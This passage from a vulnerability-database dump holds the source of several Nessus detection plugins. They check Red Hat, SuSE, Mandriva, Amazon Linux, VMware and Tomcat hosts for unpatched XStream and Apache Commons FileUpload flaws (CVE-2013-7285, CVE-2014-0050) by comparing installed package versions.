arbitrary user-supplied\nXML content, representing objects of any type. A remote attacker able\nto pass XML to XStream could use this flaw to perform a variety of\nattacks, including remote code execution in the context of the server\nrunning the XStream application. 
(CVE-2013-7285)\n\nAll jasperreports-server-pro users are advised to upgrade to this\nupdated package, which contains a backported patch to correct this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-7285\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jasperreports-server-pro package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jasperreports-server-pro\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0389\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"jasperreports-server-pro-5.5.0-6.el6ev\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n 
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jasperreports-server-pro\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T14:38:44", "description": "This update fixes a security issue with jakarta-commons-fileupload :\n\n - denial of service due to too-small buffer size used\n (CVE-2014-0050). (bnc#862781)", "edition": 17, "published": "2014-04-18T00:00:00", "title": "SuSE 11.3 Security Update : jakarta-commons-fileupload (SAT Patch Number 9087)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-04-18T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload-javadoc"], "id": "SUSE_11_JAKARTA-COMMONS-FILEUPLOAD-140403.NASL", "href": "https://www.tenable.com/plugins/nessus/73609", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73609);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0050\");\n\n script_name(english:\"SuSE 11.3 Security Update : jakarta-commons-fileupload (SAT Patch Number 9087)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a security issue with jakarta-commons-fileupload :\n\n - denial of service due to too-small buffer size used\n (CVE-2014-0050). 
(bnc#862781)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=862781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0050.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9087.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = 
get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"jakarta-commons-fileupload-1.1.1-1.37.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"jakarta-commons-fileupload-javadoc-1.1.1-1.37.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-03-01T07:49:02", "description": "The version of VMware vCenter Orchestrator Appliance installed on the\nremote host is 5.5.x prior to 5.5.2. It is, therefore, affected by a\ndenial of service vulnerability due to an error that exists in the\nincluded Apache Tomcat version related to handling 'Content-Type' HTTP\nheaders and multipart requests.", "edition": 28, "published": "2014-10-24T00:00:00", "title": "VMware vCenter Orchestrator Appliance 5.5.x < 5.5.2 DoS (VMSA-2014-0007)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator"], "id": "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2014_0007.NASL", "href": "https://www.tenable.com/plugins/nessus/78670", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78670);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"VMSA\", value:\"2014-0007\");\n\n script_name(english:\"VMware vCenter Orchestrator Appliance 5.5.x < 5.5.2 DoS (VMSA-2014-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter Orchestrator Appliance.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that 
is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Orchestrator Appliance installed on the\nremote host is 5.5.x prior to 5.5.2. It is, therefore, affected by a\ndenial of service vulnerability due to an error that exists in the\nincluded Apache Tomcat version related to handling 'Content-Type' HTTP\nheaders and multipart requests.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0007.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Orchestrator 5.5.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_orchestrator\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Orchestrator/Version\", \"Host/VMware vCenter Orchestrator/VerUI\", \"Host/VMware vCenter Orchestrator/Build\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/VerUI\");\n\nif (version =~ '^5\\\\.5\\\\.')\n{\n build = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/Build\");\n if (int(build) < 1992027)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : 5.5.2 Build 1992027' + \n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n }\n}\n\naudit(AUDIT_INST_VER_NOT_VULN, 'VMware vCenter Orchestrator Appliance', verui);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:34", "description": "Updated apache-commons-fileupload packages fix security \nvulnerability :\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition\n(CVE-2014-0050).\n\nTomcat 7 includes an embedded copy of the Apache Commons FileUpload\npackage, and was affected as well.\n\nAdditionally a build problem with maven was discovered, fixed maven\npackages are also being provided with this advisory.", "edition": 24, "published": "2014-03-14T00:00:00", "title": "Mandriva Linux Security Advisory : apache-commons-fileupload (MDVSA-2014:056)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-03-14T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tomcat-admin-webapps", "cpe:/o:mandriva:business_server:1", 
"p-cpe:/a:mandriva:linux:tomcat-docs-webapp", "p-cpe:/a:mandriva:linux:tomcat-servlet-3.0-api", "p-cpe:/a:mandriva:linux:tomcat-javadoc", "p-cpe:/a:mandriva:linux:tomcat-el-2.2-api", "p-cpe:/a:mandriva:linux:apache-commons-fileupload", "p-cpe:/a:mandriva:linux:tomcat-lib", "p-cpe:/a:mandriva:linux:tomcat", "p-cpe:/a:mandriva:linux:maven", "p-cpe:/a:mandriva:linux:tomcat-webapps", "p-cpe:/a:mandriva:linux:tomcat-jsvc", "p-cpe:/a:mandriva:linux:tomcat-jsp-2.2-api", "p-cpe:/a:mandriva:linux:apache-commons-fileupload-javadoc", "p-cpe:/a:mandriva:linux:maven-javadoc"], "id": "MANDRIVA_MDVSA-2014-056.NASL", "href": "https://www.tenable.com/plugins/nessus/73003", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:056. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73003);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"MDVSA\", value:\"2014:056\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache-commons-fileupload (MDVSA-2014:056)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-fileupload packages fix security \nvulnerability :\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition\n(CVE-2014-0050).\n\nTomcat 7 includes an 
embedded copy of the Apache Commons FileUpload\npackage, and was affected as well.\n\nAdditionally a build problem with maven was discovered, fixed maven\npackages are also being provided with this advisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0109.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0110.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:maven\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:maven-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-jsvc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandrake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-commons-fileupload-1.2.2-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-commons-fileupload-javadoc-1.2.2-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"maven-3.0.4-29.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"maven-javadoc-3.0.4-29.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-7.0.41-1.mbs1\")) 
flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-admin-webapps-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-docs-webapp-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-el-2.2-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-javadoc-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-jsp-2.2-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-jsvc-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-lib-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-servlet-3.0-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-webapps-7.0.41-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-14T19:09:30", "description": "According to its self-reported version number, the instance of Apache\nTomcat 7.0.x listening on the remote host is prior to 7.0.52. 
It is,\ntherefore, affected by an error related to handling 'Content-Type'\nHTTP headers and multipart requests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 18, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2014-02-25T00:00:00", "title": "Apache Tomcat 7.0.x < 7.0.52 Content-Type DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_7_0_52.NASL", "href": "https://www.tenable.com/plugins/nessus/72692", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72692);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/11\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"Apache Tomcat 7.0.x < 7.0.52 Content-Type DoS\");\n script_summary(english:\"Checks the Apache Tomcat version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Apache\nTomcat 7.0.x listening on the remote host is prior to 7.0.52. 
It is,\ntherefore, affected by an error related to handling 'Content-Type'\nHTTP headers and multipart requests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.52\");\n # http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?358ef049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Apache Tomcat version 7.0.52 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\n# Note that 7.0.51 contained the fix,\n# but was never released.\ntomcat_check_version(fixed:\"7.0.51\", min:\"7.0.0\", severity:SECURITY_HOLE, granularity_regex:\"^7(\\.0)?$\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T01:21:45", "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions.", "edition": 26, "published": "2014-03-28T00:00:00", "title": "Amazon Linux AMI : tomcat7 (ALAS-2014-312)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-312.NASL", "href": "https://www.tenable.com/plugins/nessus/73231", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-312.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73231);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_xref(name:\"ALAS\", 
value:\"2014-312\");\n\n script_name(english:\"Amazon Linux AMI : tomcat7 (ALAS-2014-312)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-312.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tomcat7' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n 
